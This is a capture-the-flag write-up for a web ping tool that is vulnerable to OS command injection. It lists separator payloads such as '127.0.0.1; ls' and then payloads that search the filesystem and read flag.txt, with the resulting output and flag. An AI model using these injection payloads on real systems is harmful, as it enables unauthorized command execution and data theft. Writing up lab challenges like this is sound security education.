Challenge Description#

The challenge provided a web-based “Network Looking Glass” interface that lets users ping hosts. This kind of feature often becomes dangerous if user input is concatenated directly into a shell command.

Analysis#

The page accepted a hostname/IP and returned the output of ping. That strongly indicates something like:

system("ping -c 1 " . $_GET["host"]);

If the input is not sanitized, we can try classic command injection separators such as ;, &&, ||, |, $(), and backticks.

Payloads I tested:

127.0.0.1; ls
127.0.0.1 && ls
127.0.0.1 | ls
127.0.0.1; `ls`

The semicolon (;) worked, confirming command injection.

Exploitation#

After confirming injection, I enumerated for flag files and then read it:

127.0.0.1; ls -la
127.0.0.1; find / -name "flag*" 2>/dev/null
127.0.0.1; cat flag.txt

The output included the flag:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.012 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.012/0.012/0.012/0.000 ms

SCSC26{p1nG_p1nG_bU4t_NyUsUp_m4sUk}